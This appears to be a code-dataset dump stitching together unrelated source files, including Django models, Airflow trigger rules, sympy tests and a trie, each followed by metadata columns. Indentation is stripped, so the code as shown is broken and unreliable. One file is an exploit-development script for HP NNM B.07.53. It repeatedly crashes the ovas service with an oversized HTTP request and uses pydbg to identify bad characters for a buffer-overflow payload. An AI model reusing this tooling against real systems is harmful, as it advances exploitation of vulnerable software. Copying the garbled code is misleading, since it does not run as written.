assert_not_equal(0, len(obms), message='OBMs list was empty!')
for obm in obms:
id = obm.get('id')
Api().obms_delete_by_id(identifier=id)
rsp = self.__client.last_response
assert_equal(204, rsp.status, message=rsp.status)
@test(groups=['node_put_obm_invalid'], depends_on_groups=['node_get_obm_by_node_id'])
def test_node_put_obm_invalid_node_id(self):
"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_put_obms_by_node_id(identifier='invalid_ID', body=self.__test_obm)
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
@test(groups=['node_get_obm_invalid'], depends_on_groups=['node_put_obm_invalid'])
def test_node_get_obm_invalid_node_id(self):
"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_get_obms_by_node_id(identifier='invalid_ID')
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
| apache-2.0 | -2,104,577,647,102,050,300 | 41.978678 | 114 | 0.540904 | false | 3.631238 | true | false | false |
QuincyWork/AllCodes | Python/Codes/Practice/LeetCode/211 Add and Search Word - Data structure design.py | 1 | 1913 |
# define const variable
_MAX_LETTER_SIZE = 27;
_STRING_END_TAG = '#';
class TireNode(object):
def __init__(self,x):
self.value = x
self.childNodes = {}
class WordDictionary(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TireNode(0)
def addWord(self, word):
"""
Adds a word into the data structure.
:type word: str
:rtype: void
"""
word = word + _STRING_END_TAG
currentNode = self.root
childNode = None
for value in word:
childNode = currentNode.childNodes.get(value)
if not childNode:
childNode = TireNode(value)
currentNode.childNodes[value] = childNode
currentNode = childNode
def __searchChild(self,node,value):
currentNode = node
if not value:
return True
result = False
if value[0] == '.':
for key,child in currentNode.childNodes.items():
if self.__searchChild(child,value[1:]):
result = True
break
else:
child = currentNode.childNodes.get(value[0])
if child:
result = self.__searchChild(child,value[1:])
return result
def search(self, word):
"""
Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.
:type word: str
:rtype: bool
"""
word = word + _STRING_END_TAG
return self.__searchChild(self.root, word)
if __name__ == '__main__':
d = WordDictionary()
d.addWord("bad")
d.addWord("dad")
d.addWord("mad")
print(d.search("bad"))
print(d.search("pad"))
print(d.search(".ad"))
print(d.search("b.."))
| mit | -8,859,075,159,283,428,000 | 23.189873 | 125 | 0.521193 | false | 4.172489 | false | false | false |
thorwhalen/ut | stats/util.py | 1 | 2022 | __author__ = 'thor'
from numpy import zeros, argmin, array, unique, where
from scipy.spatial.distance import cdist
def _df_picker(df, x_cols, y_col):
return df[x_cols].as_matrix(), df[[y_col]].as_matrix()
def df_picker_data_prep(x_cols, y_col):
return lambda df: _df_picker(df, x_cols, y_col)
def binomial_probs_to_multinomial_probs(binomial_probs):
multinomial_probs = zeros((len(binomial_probs), 2))
multinomial_probs[:, 1] = binomial_probs
multinomial_probs[:, 0] = 1 - multinomial_probs[:, 1]
return multinomial_probs
def multinomial_probs_to_binomial_probs(multinomial_probs):
return multinomial_probs[:, 1]
def normalize_to_one(arr):
arr = array(arr)
return arr / float(sum(arr))
def point_idx_closest_to_centroid(X, centroid=None):
"""
X is a n x m ndarray of n points in m dimensions.
point_closest_to_centroid(X, centroid) returns the index of the point of X (a row of X) that is closest to the given
centroid point. If centroid is not given, the actual centroid, X.mean(axis=1), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return argmin(cdist(X, [centroid])[:, 0])
def point_closest_to_centroid(X, centroid=None):
"""
X is a n x m ndarray of n points in m dimensions.
point_closest_to_centroid(X, centroid) returns the point of X (a row of X) that is closest to the given
centroid point. If centroid is not given, the actual centroid, X.mean(axis=1), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return X[argmin(cdist(X, [centroid])[:, 0])]
def get_cluster_representatives_indices(X, clus_labels, clus_centers):
representative_indices = list()
for label in unique(clus_labels):
cluster_point_indices = where(clus_labels == label)[0]
min_idx = argmin(cdist(X[cluster_point_indices, :], [clus_centers[label, :]])[:, 0])
representative_indices.append(cluster_point_indices[min_idx])
return array(representative_indices)
| mit | 2,205,652,758,375,168,500 | 32.7 | 120 | 0.674085 | false | 3.277147 | false | false | false |
greyshell/linuxJuicer | badchar-detection-automated/badchar-detection-HPNNM-B.07.53.py | 1 | 8764 | #!/usr/bin/env python
# Description: Identify good and bad chars in HPNNM-B.07.53
# author: greyshell
# Script requirements: python 2.7 x86, pydbg 32bit binary, python wmi, pywin32
# Copy pydbg inside C:\Python27\Lib\site-packages\
# Copy pydasm.pyd inside C:\Python27\Lib\site-packages\pydbg\
import os
import socket
import subprocess
import sys
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# Global variables
allchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
request_template = (
"GET /topology/homeBaseView HTTP/1.1\r\n"
"Host: {}\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
"Content-Length: 1048580\r\n\r\n"
)
# Current char that is being checked
cur_char = ""
badchars = []
goodchars = []
evil_str_sent = False
service_is_running = False
def chars_to_str(chars):
# Convert a list of chars to a string
result = ""
for char in chars:
result += "\\x{:02x}".format(ord(char))
return result
def crash_service():
# Send malformed data to ovas service in order to crash it. Function runs in an independent thread
global evil_str_sent, cur_char, badchars, goodchars, allchars
global service_is_running
char_counter = -1
timer = 0
while True:
# Don't send evil string if process is not running
if not service_is_running:
time.sleep(1)
continue
# If main loop reset the evil_str_sent flag to False, sent evil_str again
if not evil_str_sent:
timer = 0
char_counter += 1
if char_counter > len(allchars)-1:
print("[+] Bad chars: {}.".format(chars_to_str(badchars)))
print("[+] Good chars: {}.".format(chars_to_str(goodchars)))
print("[+] Done.")
# Hack to exit application from non-main thread
os._exit(0)
cur_char = allchars[char_counter]
# During crash [ESP + 4C] points to ("A" * 1025)th position
crash = "A" * 1025 + cur_char * 4 + "B" * 2551
evil_str = request_template.format(crash)
print("[+] Sending evil HTTP request...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
sock.send(evil_str)
sock.close()
except:
print("[+] Error sending malicious buffer; service may be down.")
print("[+] Restarting the service and retrying...")
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
finally:
evil_str_sent = True
else:
if timer > 10:
print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
print("[+] Marking last char as bad and killing the service...")
badchars.append(cur_char)
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
time.sleep(1)
timer += 1
return
def is_service_started():
# Check if service was successfully started
print("[+] Making sure the service was restarted...")
service_check_counter = 0
while not service_is_running:
if service_check_counter > 4: # Give it 5 attempts
return False
for process in wmi.WMI().Win32_Process():
if process.Name=='ovas.exe':
return process.ProcessId
service_check_counter += 1
time.sleep(1)
def is_service_responsive():
# Check if service responds to HTTP requests
print("[+] Making sure the service responds to HTTP requests...")
service_check_counter = 0
while not service_is_running:
# Give it 5 attempts
if service_check_counter > 4:
return False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
test_str = request_template.format("127.0.0.1")
sock.send(test_str)
# Give response 1 second to arrive
sock.settimeout(1.0)
resp = sock.recv(1024)
if resp:
return True
sock.close()
except Exception as e:
pass
service_check_counter += 1
def restart_service():
# Restart ovas.exe service and return its PID
global service_is_running
service_is_running = False
# Check that the service is running before stopping it
for process in wmi.WMI().Win32_Process():
if process.Name=='ovas.exe':
print("[+] Stopping the service...")
# Forcefully terminate the process
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
print("[+] Starting the service...")
# Start the process with reliability
subprocess.Popen('ovstop -c ovas').communicate()
subprocess.Popen('ovstart -c ovas').communicate()
pid = is_service_started()
if pid:
print("[+] The service was restarted.")
else:
print("[-] Service was not found in process list. Restarting...")
return restart_service()
if is_service_responsive():
print("[+] Service responds to HTTP requests. Green ligth.")
service_is_running = True
return pid
else:
print("[-] Service does not respond to HTTP requests. Restarting...")
return restart_service()
def check_char(rawdata):
# Compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
global badchars, goodchars
hexdata = dbg.hex_dump(rawdata)
print("[+] Buffer: {}".format(hexdata))
# Sent data must be equal to data in memory
if rawdata == (cur_char * 4):
goodchars.append(cur_char)
print("[+] Char {} is good.".format(chars_to_str(cur_char)))
print("[+] Good chars so far: {}.".format(chars_to_str(goodchars)))
with open("goodchars.txt",'w') as f:
f.write(chars_to_str(goodchars))
else:
badchars.append(cur_char)
print("[+] Char {} is bad.".format(chars_to_str(cur_char)))
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
return
def _access_violation_handler(dbg):
# On access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
print("[+] Access violation caught.")
# [ESP + 0x4C] points to our test buffer
esp_offset = 0x4C
buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
buf_address = dbg.flip_endian_dword(buf_address)
print("[+] [DEBUG] buf_address: {}".format(buf_address))
if buf_address:
# Read 4 bytes test buffer
buffer = dbg.read(buf_address, 0x4)
print("[+] buffer is " + buffer);
else:
# Now when the first request sent is the one for checking if the
# service responds, the buf_address sometimes returns 0. This is to
# handle that case.
buffer = ""
print("[+] Checking whether the char is good or bad...")
check_char(buffer)
dbg.detach()
return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
# Create a debugger instance and attach to minishare PID"""
dbg = pydbg()
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
while True:
try:
print("[+] Attaching debugger to pid: {}.".format(pid))
if dbg.attach(pid):
return dbg
else:
return False
except Exception as e:
print("[+] Error while attaching: {}.".format(e.message))
return False
if __name__ == '__main__':
# Create and start crasher thread
crasher_thread = threading.Thread(target=crash_service)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] thread started");
# Main loop
while True:
pid = restart_service()
print("[+] restart_service "+str(pid));
dbg = debug_process(pid)
print("[+] dbg started");
if dbg:
# Tell crasher thread to send malicious input to process
evil_str_sent = False
# Enter the debugging loop
dbg.run() | mit | 5,686,919,584,607,260,000 | 29.754386 | 116 | 0.674464 | false | 2.659788 | false | false | false |
MarxDimitri/schmankerl | schmankerlapp/models.py | 1 | 1505 | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Restaurant(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='restaurant')
name = models.CharField(max_length=500)
phone = models.CharField(max_length=500)
address = models.CharField(max_length=500)
logo = models.ImageField(upload_to='restaurant_logo/', blank=False)
def __str__(self):
return self.name
class Customer(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='customer')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Driver(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='driver')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Meal(models.Model):
restaurant = models.ForeignKey(Restaurant)
name = models.CharField(max_length=500)
short_description = models.CharField(max_length=500)
image = models.ImageField(upload_to='meal_images/', blank=False)
price = models.FloatField(default=0)
def __str__(self):
return self.name
| apache-2.0 | 687,804,165,970,565,200 | 35.707317 | 90 | 0.706312 | false | 3.626506 | false | false | false |
Fokko/incubator-airflow | airflow/ti_deps/deps/trigger_rule_dep.py | 1 | 9884 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from sqlalchemy import case, func
import airflow
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.utils.db import provide_session
from airflow.utils.state import State
class TriggerRuleDep(BaseTIDep):
"""
Determines if a task's upstream tasks are in a state that allows a given task instance
to run.
"""
NAME = "Trigger Rule"
IGNOREABLE = True
IS_TASK_DEP = True
@provide_session
def _get_dep_statuses(self, ti, session, dep_context):
TI = airflow.models.TaskInstance
TR = airflow.utils.trigger_rule.TriggerRule
# Checking that all upstream dependencies have succeeded
if not ti.task.upstream_list:
yield self._passing_status(
reason="The task instance did not have any upstream tasks.")
return
if ti.task.trigger_rule == TR.DUMMY:
yield self._passing_status(reason="The task had a dummy trigger rule set.")
return
# TODO(unknown): this query becomes quite expensive with dags that have many
# tasks. It should be refactored to let the task report to the dag run and get the
# aggregates from there.
qry = (
session
.query(
func.coalesce(func.sum(
case([(TI.state == State.SUCCESS, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.SKIPPED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.FAILED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.UPSTREAM_FAILED, 1)], else_=0)), 0),
func.count(TI.task_id),
)
.filter(
TI.dag_id == ti.dag_id,
TI.task_id.in_(ti.task.upstream_task_ids),
TI.execution_date == ti.execution_date,
TI.state.in_([
State.SUCCESS, State.FAILED,
State.UPSTREAM_FAILED, State.SKIPPED]),
)
)
successes, skipped, failed, upstream_failed, done = qry.first()
yield from self._evaluate_trigger_rule(
ti=ti,
successes=successes,
skipped=skipped,
failed=failed,
upstream_failed=upstream_failed,
done=done,
flag_upstream_failed=dep_context.flag_upstream_failed,
session=session)
@provide_session
def _evaluate_trigger_rule(
self,
ti,
successes,
skipped,
failed,
upstream_failed,
done,
flag_upstream_failed,
session):
"""
Yields a dependency status that indicate whether the given task instance's trigger
rule was met.
:param ti: the task instance to evaluate the trigger rule of
:type ti: airflow.models.TaskInstance
:param successes: Number of successful upstream tasks
:type successes: int
:param skipped: Number of skipped upstream tasks
:type skipped: int
:param failed: Number of failed upstream tasks
:type failed: int
:param upstream_failed: Number of upstream_failed upstream tasks
:type upstream_failed: int
:param done: Number of completed upstream tasks
:type done: int
:param flag_upstream_failed: This is a hack to generate
the upstream_failed state creation while checking to see
whether the task instance is runnable. It was the shortest
path to add the feature
:type flag_upstream_failed: bool
:param session: database session
:type session: sqlalchemy.orm.session.Session
"""
TR = airflow.utils.trigger_rule.TriggerRule
task = ti.task
upstream = len(task.upstream_task_ids)
tr = task.trigger_rule
upstream_done = done >= upstream
upstream_tasks_state = {
"total": upstream, "successes": successes, "skipped": skipped,
"failed": failed, "upstream_failed": upstream_failed, "done": done
}
# TODO(aoen): Ideally each individual trigger rules would be its own class, but
# this isn't very feasible at the moment since the database queries need to be
# bundled together for efficiency.
# handling instant state assignment based on trigger rules
if flag_upstream_failed:
if tr == TR.ALL_SUCCESS:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ALL_FAILED:
if successes or skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_SUCCESS:
if upstream_done and not successes:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_FAILED:
if upstream_done and not (failed or upstream_failed):
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_FAILED:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped == upstream:
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_SKIPPED:
if skipped:
ti.set_state(State.SKIPPED, session)
if tr == TR.ONE_SUCCESS:
if successes <= 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task success, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ONE_FAILED:
if not failed and not upstream_failed:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task failure, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ALL_SUCCESS:
num_failures = upstream - successes
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_FAILED:
num_successes = upstream - failed - upstream_failed
if num_successes > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have failed, but found {1} non-failure(s). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_successes, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_DONE:
if not upstream_done:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have completed, but found {1} task(s) that "
"weren't done. upstream_tasks_state={2}, "
"upstream_task_ids={3}"
.format(tr, upstream_done, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_FAILED:
num_failures = upstream - successes - skipped
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded or been skipped, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_SKIPPED:
if not upstream_done or (skipped > 0):
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to not have been skipped, but found {1} task(s) skipped. "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, skipped, upstream_tasks_state,
task.upstream_task_ids))
else:
yield self._failing_status(
reason="No strategy to evaluate trigger rule '{0}'.".format(tr))
| apache-2.0 | -311,230,294,439,406,660 | 43.32287 | 94 | 0.563234 | false | 4.48254 | false | false | false |
yeleman/health_ident | health_ident/management/commands/export_j2me.py | 1 | 2794 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import os
import zipfile
from django.conf import settings
from optparse import make_option
from django.core.management.base import BaseCommand
from django.template import loader, Context
from health_ident.models import Entity, HealthEntity
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('-f',
help='CSV file to export health_entity_properties to',
action='store',
dest='input_file'),
make_option('-s',
help='Comma-separated list of Region Slugs to include',
action='store',
dest='only_regions'),
)
def handle(self, *args, **options):
export_dir = os.path.join(settings.BASE_DIR, 'j2me')
if not os.path.exists(export_dir):
os.mkdir(export_dir)
if options.get('only_regions'):
only_regions = options.get('only_regions').split(',')
regions = HealthEntity.objects.filter(slug__in=only_regions)
else:
mali = Entity.objects.get(slug='mali')
regions = HealthEntity.objects.filter(parent=mali)
print("Exporting Health Entities...")
for region in regions:
for district in region.get_children():
district_file_content = loader.get_template("j2me/EntityHashTableDistrict.java") \
.render(Context({'district': district}))
with open(os.path.join(export_dir, "EntityHashTable{}.java".format(district.slug)), 'w') as f:
f.write(district_file_content.encode('utf-8'))
print(district.name)
with open(os.path.join(export_dir, "Utils.java"), 'w') as f:
f.write(loader.get_template("j2me/Utils.java").render(Context({})).encode('utf-8'))
with open(os.path.join(export_dir, "EntityHashTable.java"), 'w') as f:
f.write(loader.get_template("j2me/EntityHashTable.java").render(Context({})).encode('utf-8'))
region_file_content = loader.get_template("j2me/StaticCodes.java") \
.render(Context({'regions': regions}))
with open(os.path.join(export_dir, "StaticCodes.java"), 'w') as f:
f.write(region_file_content.encode('utf-8'))
zf = zipfile.ZipFile(options.get('input_file'), mode='w')
for asset in os.listdir(os.path.join(export_dir)):
zf.write(os.path.join(export_dir, asset),
os.path.join('snisi', 'entities', asset))
zf.close() | unlicense | 8,823,605,234,748,818,000 | 35.298701 | 110 | 0.582319 | false | 3.885953 | false | false | false |
sumihai-tekindo/account_sicepat | add_sub_menu/models/check_id.py | 1 | 1245 | from datetime import datetime
from openerp.osv import fields,osv
from openerp.tools.translate import _
class purchase_requisition_line(osv.osv):
_inherit = "purchase.requisition.line"
def stock_out(self, cr, uid, ids,stock_out):
if self.stock_out:
return {
'view_type': 'form',
'flags': {'action_buttons': True},
'view_mode': 'kanban,form',
'res_model': 'stock.picking.type',
'target': 'current',
'res_id': 'stock.picking',
'type': 'ir.actions.act_window'
}
# def onchange_product_id(self, cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=None):
# oc_res = super(purchase_requisition_line,self).onchange_product_id(cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=context)
# if(product_id):
# product = self.pool.get('product.product').browse(cr,uid,product_id,context=context)
# if (product.default_code=='Asset'):
# warning={
# 'title':'WARNING',
# 'message':"There are %s %s for %s in stock"%(product.qty_available,product.uom_id.name,product.name)
# }
# oc_res.update({'warning':warning})
# return oc_res
| gpl-3.0 | -3,897,940,405,699,393,500 | 35.787879 | 191 | 0.659438 | false | 2.875289 | false | false | false |
nkoep/blaplay | blaplay/formats/wav.py | 1 | 1831 | # blaplay, Copyright (C) 2012 Niklas Koep
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import wave
from _blatrack import BlaTrack
from blaplay.formats import TagParseError
from _identifiers import *
class Wav(BlaTrack):
__slots__ = ("extensions")
extensions = ["wav"]
def _read_tags(self):
# The wave module uses fixed sampling rates. Custom sampling rates are
# therefore mapped to commonly used ones. Additionally, it doesn't
# detect compression modes like ADPCM. Therefore we just specify
# `lossless' as encoding type; it's not like these are common
# use-cases anyway.
try:
audio = wave.open(self.uri, "r")
except wave.Error:
raise TagParseError
self[SAMPLING_RATE] = audio.getframerate()
self[CHANNELS] = audio.getnchannels()
self[CHANNEL_MODE] = "Mono" if self[CHANNELS] == 1 else "Stereo"
self[BITRATE] = (audio.getframerate() * 8 * audio.getsampwidth() *
self[CHANNELS])
self[LENGTH] = audio.getnframes() / audio.getframerate()
self[FORMAT] = "WAVE"
self[ENCODING] = "lossless"
audio.close()
| gpl-2.0 | -6,617,483,503,426,571,000 | 35.62 | 78 | 0.677226 | false | 3.9718 | false | false | false |
kaushik94/sympy | sympy/printing/tests/test_rcode.py | 7 | 14176 | from sympy.core import (S, pi, oo, Symbol, symbols, Rational, Integer,
GoldenRatio, EulerGamma, Catalan, Lambda, Dummy, Eq)
from sympy.functions import (Piecewise, sin, cos, Abs, exp, ceiling, sqrt,
gamma, sign, Max, Min, factorial, beta)
from sympy.sets import Range
from sympy.logic import ITE
from sympy.codegen import For, aug_assign, Assignment
from sympy.utilities.pytest import raises
from sympy.printing.rcode import RCodePrinter
from sympy.utilities.lambdify import implemented_function
from sympy.tensor import IndexedBase, Idx
from sympy.matrices import Matrix, MatrixSymbol
from sympy import rcode
from difflib import Differ
from pprint import pprint
x, y, z = symbols('x,y,z')
def test_printmethod():
class fabs(Abs):
def _rcode(self, printer):
return "abs(%s)" % printer._print(self.args[0])
assert rcode(fabs(x)) == "abs(x)"
def test_rcode_sqrt():
assert rcode(sqrt(x)) == "sqrt(x)"
assert rcode(x**0.5) == "sqrt(x)"
assert rcode(sqrt(x)) == "sqrt(x)"
def test_rcode_Pow():
assert rcode(x**3) == "x^3"
assert rcode(x**(y**3)) == "x^(y^3)"
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(1/(g(x)*3.5)**(x - y**x)/(x**2 + y)) == \
"(3.5*2*x)^(-x + y^x)/(x^2 + y)"
assert rcode(x**-1.0) == '1.0/x'
assert rcode(x**Rational(2, 3)) == 'x^(2.0/3.0)'
_cond_cfunc = [(lambda base, exp: exp.is_integer, "dpowi"),
(lambda base, exp: not exp.is_integer, "pow")]
assert rcode(x**3, user_functions={'Pow': _cond_cfunc}) == 'dpowi(x, 3)'
assert rcode(x**3.2, user_functions={'Pow': _cond_cfunc}) == 'pow(x, 3.2)'
def test_rcode_Max():
# Test for gh-11926
assert rcode(Max(x,x*x),user_functions={"Max":"my_max", "Pow":"my_pow"}) == 'my_max(x, my_pow(x, 2))'
def test_rcode_constants_mathh():
p=rcode(exp(1))
assert rcode(exp(1)) == "exp(1)"
assert rcode(pi) == "pi"
assert rcode(oo) == "Inf"
assert rcode(-oo) == "-Inf"
def test_rcode_constants_other():
assert rcode(2*GoldenRatio) == "GoldenRatio = 1.61803398874989;\n2*GoldenRatio"
assert rcode(
2*Catalan) == "Catalan = 0.915965594177219;\n2*Catalan"
assert rcode(2*EulerGamma) == "EulerGamma = 0.577215664901533;\n2*EulerGamma"
def test_rcode_Rational():
assert rcode(Rational(3, 7)) == "3.0/7.0"
assert rcode(Rational(18, 9)) == "2"
assert rcode(Rational(3, -7)) == "-3.0/7.0"
assert rcode(Rational(-3, -7)) == "3.0/7.0"
assert rcode(x + Rational(3, 7)) == "x + 3.0/7.0"
assert rcode(Rational(3, 7)*x) == "(3.0/7.0)*x"
def test_rcode_Integer():
assert rcode(Integer(67)) == "67"
assert rcode(Integer(-1)) == "-1"
def test_rcode_functions():
assert rcode(sin(x) ** cos(x)) == "sin(x)^cos(x)"
assert rcode(factorial(x) + gamma(y)) == "factorial(x) + gamma(y)"
assert rcode(beta(Min(x, y), Max(x, y))) == "beta(min(x, y), max(x, y))"
def test_rcode_inline_function():
x = symbols('x')
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(g(x)) == "2*x"
g = implemented_function('g', Lambda(x, 2*x/Catalan))
assert rcode(
g(x)) == "Catalan = %s;\n2*x/Catalan" % Catalan.n()
A = IndexedBase('A')
i = Idx('i', symbols('n', integer=True))
g = implemented_function('g', Lambda(x, x*(1 + x)*(2 + x)))
res=rcode(g(A[i]), assign_to=A[i])
ref=(
"for (i in 1:n){\n"
" A[i] = (A[i] + 1)*(A[i] + 2)*A[i];\n"
"}"
)
assert res == ref
def test_rcode_exceptions():
assert rcode(ceiling(x)) == "ceiling(x)"
assert rcode(Abs(x)) == "abs(x)"
assert rcode(gamma(x)) == "gamma(x)"
def test_rcode_user_functions():
x = symbols('x', integer=False)
n = symbols('n', integer=True)
custom_functions = {
"ceiling": "myceil",
"Abs": [(lambda x: not x.is_integer, "fabs"), (lambda x: x.is_integer, "abs")],
}
assert rcode(ceiling(x), user_functions=custom_functions) == "myceil(x)"
assert rcode(Abs(x), user_functions=custom_functions) == "fabs(x)"
assert rcode(Abs(n), user_functions=custom_functions) == "abs(n)"
def test_rcode_boolean():
assert rcode(True) == "True"
assert rcode(S.true) == "True"
assert rcode(False) == "False"
assert rcode(S.false) == "False"
assert rcode(x & y) == "x & y"
assert rcode(x | y) == "x | y"
assert rcode(~x) == "!x"
assert rcode(x & y & z) == "x & y & z"
assert rcode(x | y | z) == "x | y | z"
assert rcode((x & y) | z) == "z | x & y"
assert rcode((x | y) & z) == "z & (x | y)"
def test_rcode_Relational():
from sympy import Eq, Ne, Le, Lt, Gt, Ge
assert rcode(Eq(x, y)) == "x == y"
